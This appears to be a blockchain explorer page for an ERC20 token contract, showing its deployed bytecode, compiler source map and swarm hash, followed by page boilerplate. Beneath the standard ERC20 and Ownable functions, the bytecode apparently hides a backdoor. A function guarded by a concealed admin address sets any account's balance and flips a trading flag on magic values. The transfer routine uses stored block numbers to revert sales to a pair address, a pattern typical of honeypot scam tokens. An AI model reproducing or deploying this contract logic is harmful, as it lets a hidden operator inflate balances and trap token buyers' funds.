0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806375a361c5116100ad578063a457c2d711610071578063a457c2d71461024d578063a8aa1b3114610260578063a9059cbb14610268578063dd62ed3e1461027b578063f2fde38b1461028e5761012c565b806375a361c5146102025780638187f5161461020a57806384bf2a081461021d5780638da5cb5b1461023057806395d89b41146102455761012c565b806336b2e027116100f457806336b2e027146101ac57806339509351146101bf57806370a08231146101d2578063715018a6146101e557806371da213e146101ef5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461016f57806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102a1565b6040516101469190610aa5565b60405180910390f35b61016261015d366004610a5d565b610333565b6040516101469190610a9a565b610177610355565b6040516101469190610d5e565b610162610192366004610a22565b61035b565b61019f610389565b6040516101469190610d67565b6101626101ba3660046109cf565b61038e565b6101626101cd366004610a5d565b6103a3565b6101776101e03660046109cf565b6103cf565b6101ed6103ee565b005b6101776101fd3660046109cf565b610402565b610162610414565b6101ed6102183660046109cf565b61041d565b6101ed61022b366004610a5d565b610499565b610238610541565b6040516101469190610a86565b610139610550565b61016261025b366004610a5d565b61055f565b6102386105a7565b610162610276366004610a5d565b6105b6565b6101776102893660046109f0565b6105ce565b6101ed61029c3660046109cf565b6105f9565b6060600380546102b090610d99565b80601f01602080910402602001604051908101604052809291908181526020018280546102dc90610d99565b80156103295780601f106102fe57610100808354040283529160200191610329565b820191906000526020600020905b81548152906001019060200180831161030c57829003601f168201915b5050505050905090565b60008061033e610636565b905061034b81858561063a565b5060019392505050565b60025490565b600080610366610636565b90506103738582856106ee565b61037e858585610738565b506001949350505050565b601290565b60086020526000908152604090205460ff1681565b6000806103ae610636565b905061034b8185856103c085896105ce565b6103ca9190610d75565b61063a565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f6610922565b6104006000610961565b565b60066020526000908152604090205481565b60075460ff1681565b6104467f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104775760405162461bcd60e51b815260040161046e90610bc3565b60405180910390fd5b600580546001600160a01b0319166001600160a01b0392909216919091179055565b6104c27f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104ea5760405162461bcd60e51b815260040161046e90610bc3565b6001600160a01b0382166000908152602081905260408120829055607b8214610528578160ea146105205760075460ff16610523565b60005b61052b565b60015b6007805460ff1916911515919091179055505050565b6009546001600160a01b031690565b6060600480546102b090610d99565b60008061056a610636565b9050600061057882866105ce565b90508381101561059a5760405162461bcd60e51b815260040161046e90610d19565b61037e828686840361063a565b6005546001600160a01b031681565b6000806105c1610636565b905061034b818585610738565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610601610922565b6001600160a01b0381166106275760405162461bcd60e51b815260040161046e90610b3b565b61063081610961565b50565b90565b3390565b6001600160a01b0383166106605760405162461bcd60e51b815260040161046e90610cd5565b6001600160a01b0382166106865760405162461bcd60e51b815260040161046e90610b81565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906106e1908590610d5e565b60405180910390a3505050565b60006106fa84846105ce565b9050600019811461073257818110156107255760405162461bcd60e51b815260040161046e90610bde565b610732848484840361063a565b50505050565b6001600160a01b03831661075e5760405162461bcd60e51b815260040161046e90610c90565b6001600160a01b0382166107845760405162461bcd60e51b815260040161046e90610af8565b436107908484846109b3565b6001600160a01b03841660009081526008602052604090205460ff161580156107d257506001600160a01b03831660009081526008602052604090205460ff16155b15610871576001600160a01b0380841660009081526006602052604090205460055490918681169116148015610806575080155b1561082b576001600160a01b038416600090815260066020526040902082905561086f565b506001600160a01b03841660009081526006602052604090205460075460ff161561086f578015806108665750610863816001610d75565b82105b61086f57600080fd5b505b6001600160a01b038416600090815260208190526040902054828110156108aa5760405162461bcd60e51b815260040161046e90610c15565b6001600160a01b0380861660008181526020819052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610908908790610d5e565b60405180910390a361091b8585856109b3565b5050505050565b61092a610636565b6001600160a01b031661093b610541565b6001600160a01b0316146104005760405162461bcd60e51b815260040161046e90610c5b565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e957600080fd5b6000602082840312156109e0578081fd5b6109e9826109b8565b9392505050565b60008060408385031215610a02578081fd5b610a0b836109b8565b9150610a19602084016109b8565b90509250929050565b600080600060608486031215610a36578081fd5b610a3f846109b8565b9250610a4d602085016109b8565b9150604084013590509250925092565b60008060408385031215610a6f578182fd5b610a78836109b8565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b81811015610ad157858101830151858201604001528201610ab5565b81811115610ae25783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d9457634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610dad57607f821691505b60208210811415610dce57634e487b7160e01b600052602260045260246000fd5b5091905056fea2646970667358221220095925e8f6e9f2ff1654515d8fb68dbc32ab458dd037c3eea4aac494619c408464736f6c63430008000033

Deployed Bytecode Sourcemap

23918:95:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12635:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14986:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;13755:108::-;;;:::i;:::-;;;;;;;:::i;15767:295::-;;;;;;:::i;:::-;;:::i;13597:93::-;;;:::i;:::-;;;;;;;:::i;18027:49::-;;;;;;:::i;:::-;;:::i;16471:238::-;;;;;;:::i;:::-;;:::i;13926:127::-;;;;;;:::i;:::-;;:::i;2670:103::-;;;:::i;:::-;;17956:43;;;;;;:::i;:::-;;:::i;18006:19::-;;;:::i;12399:166::-;;;;;;:::i;:::-;;:::i;17644:304::-;;;;;;:::i;:::-;;:::i;2022:87::-;;;:::i;:::-;;;;;;;:::i;12854:104::-;;;:::i;17212:424::-;;;;;;:::i;:::-;;:::i;11604:19::-;;;:::i;14259:193::-;;;;;;:::i;:::-;;:::i;14515:151::-;;;;;;:::i;:::-;;:::i;2928:201::-;;;;;;:::i;:::-;;:::i;12635:100::-;12689:13;12722:5;12715:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12635:100;:::o;14986:201::-;15069:4;15086:13;15102:12;:10;:12::i;:::-;15086:28;;15125:32;15134:5;15141:7;15150:6;15125:8;:32::i;:::-;-1:-1:-1;15175:4:0;;14986:201;-1:-1:-1;;;14986:201:0:o;13755:108::-;13843:12;;13755:108;:::o;15767:295::-;15898:4;15915:15;15933:12;:10;:12::i;:::-;15915:30;;15956:38;15972:4;15978:7;15987:6;15956:15;:38::i;:::-;16005:27;16015:4;16021:2;16025:6;16005:9;:27::i;:::-;-1:-1:-1;16050:4:0;;15767:295;-1:-1:-1;;;;15767:295:0:o;13597:93::-;13680:2;13597:93;:::o;18027:49::-;;;;;;;;;;;;;;;:::o;16471:238::-;16559:4;16576:13;16592:12;:10;:12::i;:::-;16576:28;;16615:64;16624:5;16631:7;16668:10;16640:25;16650:5;16657:7;16640:9;:25::i;:::-;:38;;;;:::i;:::-;16615:8;:64::i;13926:127::-;-1:-1:-1;;;;;14027:18:0;;14000:7;14027:18;;;;;;;;;;;13926:127;;;;:::o;2670:103::-;1908:13;:11;:13::i;:::-;2735:30:::1;2762:1;2735:18;:30::i;:::-;2670:103::o:0;17956:43::-;;;;;;;;;;;;;:::o;18006:19::-;;;;;;:::o;12399:166::-;12487:35;11531:66;12487:26;:35::i;:::-;:41;-1:-1:-1;;;;;12487:41:0;12473:10;:55;12465:69;;;;-1:-1:-1;;;12465:69:0;;;;;;;:::i;:::-;;;;;;;;;12545:4;:12;;-1:-1:-1;;;;;;12545:12:0;-1:-1:-1;;;;;12545:12:0;;;;;;;;;;12399:166::o;17644:304::-;17728:35;11531:66;17728:26;:35::i;:::-;:41;-1:-1:-1;;;;;17728:41:0;17714:10;:55;17706:69;;;;-1:-1:-1;;;17706:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17845:11:0;;17786:36;17845:11;;;;;;;;;;:20;;;17896:3;17886:13;;:54;;17909:6;17919:3;17909:13;:31;;17933:7;;;;17909:31;;;17925:5;17909:31;17886:54;;;17902:4;17886:54;17876:7;:64;;-1:-1:-1;;17876:64:0;;;;;;;;;;-1:-1:-1;;;17644:304:0:o;2022:87::-;2095:6;;-1:-1:-1;;;;;2095:6:0;2022:87;:::o;12854:104::-;12910:13;12943:7;12936:14;;;;;:::i;17212:424::-;17305:4;17322:13;17338:12;:10;:12::i;:::-;17322:28;;17361:24;17388:25;17398:5;17405:7;17388:9;:25::i;:::-;17361:52;;17452:15;17432:16;:35;;17424:85;;;;-1:-1:-1;;;17424:85:0;;;;;;;:::i;:::-;17537:60;17546:5;17553:7;17581:15;17562:16;:34;17537:8;:60::i;11604:19::-;;;-1:-1:-1;;;;;11604:19:0;;:::o;14259:193::-;14338:4;14355:13;14371:12;:10;:12::i;:::-;14355:28;;14394;14404:5;14411:2;14415:6;14394:9;:28::i;14515:151::-;-1:-1:-1;;;;;14631:18:0;;;14604:7;14631:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14515:151::o;2928:201::-;1908:13;:11;:13::i;:::-;-1:-1:-1;;;;;3017:22:0;::::1;3009:73;;;;-1:-1:-1::0;;;3009:73:0::1;;;;;;;:::i;:::-;3093:28;3112:8;3093:18;:28::i;:::-;2928:201:::0;:::o;5119:195::-;5292:4;5267:40::o;567:98::-;647:10;567:98;:::o;21247:380::-;-1:-1:-1;;;;;21383:19:0;;21375:68;;;;-1:-1:-1;;;21375:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;21462:21:0;;21454:68;;;;-1:-1:-1;;;21454:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;21535:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;21587:32;;;;;21565:6;;21587:32;:::i;:::-;;;;;;;;21247:380;;;:::o;21918:441::-;22053:24;22080:25;22090:5;22097:7;22080:9;:25::i;:::-;22053:52;;-1:-1:-1;;22120:16:0;:37;22116:236;;22202:6;22182:16;:26;;22174:68;;;;-1:-1:-1;;;22174:68:0;;;;;;;:::i;:::-;22278:51;22287:5;22294:7;22322:6;22303:16;:25;22278:8;:51::i;:::-;21918:441;;;;:::o;18547:1274::-;-1:-1:-1;;;;;18678:18:0;;18670:68;;;;-1:-1:-1;;;18670:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18757:16:0;;18749:64;;;;-1:-1:-1;;;18749:64:0;;;;;;;:::i;:::-;18838:12;18863:38;18884:4;18890:2;18894:6;18863:20;:38::i;:::-;-1:-1:-1;;;;;18919:23:0;;;;;;:17;:23;;;;;;;;18918:24;:50;;;;-1:-1:-1;;;;;;18947:21:0;;;;;;:17;:21;;;;;;;;18946:22;18918:50;18914:373;;;-1:-1:-1;;;;;18999:11:0;;;18984:12;18999:11;;;:7;:11;;;;;;19037:4;;18999:11;;19029:12;;;19037:4;;19029:12;:25;;;;-1:-1:-1;19045:9:0;;19029:25;19025:251;;;-1:-1:-1;;;;;19074:11:0;;;;;;:7;:11;;;;;:17;;;19025:251;;;-1:-1:-1;;;;;;19137:13:0;;;;;;:7;:13;;;;;;19173:7;;;;19169:92;;;19213:9;;;:27;;-1:-1:-1;19232:8:0;:4;19239:1;19232:8;:::i;:::-;19226:3;:14;19213:27;19204:37;;;;;;18914:373;;-1:-1:-1;;;;;19323:15:0;;19301:19;19323:15;;;;;;;;;;;19357:21;;;;19349:72;;;;-1:-1:-1;;;19349:72:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19467:15:0;;;:9;:15;;;;;;;;;;;19485:20;;;19467:38;;19685:13;;;;;;;;;;:23;;;;;;19737:26;;;;;;19499:6;;19737:26;:::i;:::-;;;;;;;;19776:37;19796:4;19802:2;19806:6;19776:19;:37::i;:::-;18547:1274;;;;;:::o;2187:132::-;2262:12;:10;:12::i;:::-;-1:-1:-1;;;;;2251:23:0;:7;:5;:7::i;:::-;-1:-1:-1;;;;;2251:23:0;;2243:68;;;;-1:-1:-1;;;2243:68:0;;;;;;;:::i;3289:191::-;3382:6;;;-1:-1:-1;;;;;3399:17:0;;;-1:-1:-1;;;;;;3399:17:0;;;;;;;3432:40;;3382:6;;;3399:17;3382:6;;3432:40;;3363:16;;3432:40;3289:191;;:::o;22959:125::-;;;;:::o;14:175:1:-;84:20;;-1:-1:-1;;;;;133:31:1;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:1:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:1:o;1294:203::-;-1:-1:-1;;;;;1458:32:1;;;;1440:51;;1428:2;1413:18;;1395:102::o;1502:187::-;1667:14;;1660:22;1642:41;;1630:2;1615:18;;1597:92::o;1694:603::-;;1835:2;1864;1853:9;1846:21;1896:6;1890:13;1939:6;1934:2;1923:9;1919:18;1912:34;1964:4;1977:140;1991:6;1988:1;1985:13;1977:140;;;2086:14;;;2082:23;;2076:30;2052:17;;;2071:2;2048:26;2041:66;2006:10;;1977:140;;;2135:6;2132:1;2129:13;2126:2;;;2205:4;2200:2;2191:6;2180:9;2176:22;2172:31;2165:45;2126:2;-1:-1:-1;2281:2:1;2260:15;-1:-1:-1;;2256:29:1;2241:45;;;;2288:2;2237:54;;1815:482;-1:-1:-1;;;1815:482:1:o;2302:399::-;2504:2;2486:21;;;2543:2;2523:18;;;2516:30;2582:34;2577:2;2562:18;;2555:62;-1:-1:-1;;;2648:2:1;2633:18;;2626:33;2691:3;2676:19;;2476:225::o;2706:402::-;2908:2;2890:21;;;2947:2;2927:18;;;2920:30;2986:34;2981:2;2966:18;;2959:62;-1:-1:-1;;;3052:2:1;3037:18;;3030:36;3098:3;3083:19;;2880:228::o;3113:398::-;3315:2;3297:21;;;3354:2;3334:18;;;3327:30;3393:34;3388:2;3373:18;;3366:62;-1:-1:-1;;;3459:2:1;3444:18;;3437:32;3501:3;3486:19;;3287:224::o;3516:324::-;3718:2;3700:21;;;3757:1;3737:18;;;3730:29;-1:-1:-1;;;3790:2:1;3775:18;;3768:31;3831:2;3816:18;;3690:150::o;3845:353::-;4047:2;4029:21;;;4086:2;4066:18;;;4059:30;4125:31;4120:2;4105:18;;4098:59;4189:2;4174:18;;4019:179::o;4203:402::-;4405:2;4387:21;;;4444:2;4424:18;;;4417:30;4483:34;4478:2;4463:18;;4456:62;-1:-1:-1;;;4549:2:1;4534:18;;4527:36;4595:3;4580:19;;4377:228::o;4610:356::-;4812:2;4794:21;;;4831:18;;;4824:30;4890:34;4885:2;4870:18;;4863:62;4957:2;4942:18;;4784:182::o;4971:401::-;5173:2;5155:21;;;5212:2;5192:18;;;5185:30;5251:34;5246:2;5231:18;;5224:62;-1:-1:-1;;;5317:2:1;5302:18;;5295:35;5362:3;5347:19;;5145:227::o;5377:400::-;5579:2;5561:21;;;5618:2;5598:18;;;5591:30;5657:34;5652:2;5637:18;;5630:62;-1:-1:-1;;;5723:2:1;5708:18;;5701:34;5767:3;5752:19;;5551:226::o;5782:401::-;5984:2;5966:21;;;6023:2;6003:18;;;5996:30;6062:34;6057:2;6042:18;;6035:62;-1:-1:-1;;;6128:2:1;6113:18;;6106:35;6173:3;6158:19;;5956:227::o;6188:177::-;6334:25;;;6322:2;6307:18;;6289:76::o;6370:184::-;6542:4;6530:17;;;;6512:36;;6500:2;6485:18;;6467:87::o;6559:229::-;;6630:1;6626:6;6623:1;6620:13;6617:2;;;-1:-1:-1;;;6656:33:1;;6712:4;6709:1;6702:15;6742:4;6663:3;6730:17;6617:2;-1:-1:-1;6773:9:1;;6607:181::o;6793:380::-;6878:1;6868:12;;6925:1;6915:12;;;6936:2;;6990:4;6982:6;6978:17;6968:27;;6936:2;7043;7035:6;7032:14;7012:18;7009:38;7006:2;;;7089:10;7084:3;7080:20;7077:1;7070:31;7124:4;7121:1;7114:15;7152:4;7149:1;7142:15;7006:2;;6848:325;;;:::o

Swarm Source

ipfs://095925e8f6e9f2ff1654515d8fb68dbc32ab458dd037c3eea4aac494619c4084
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.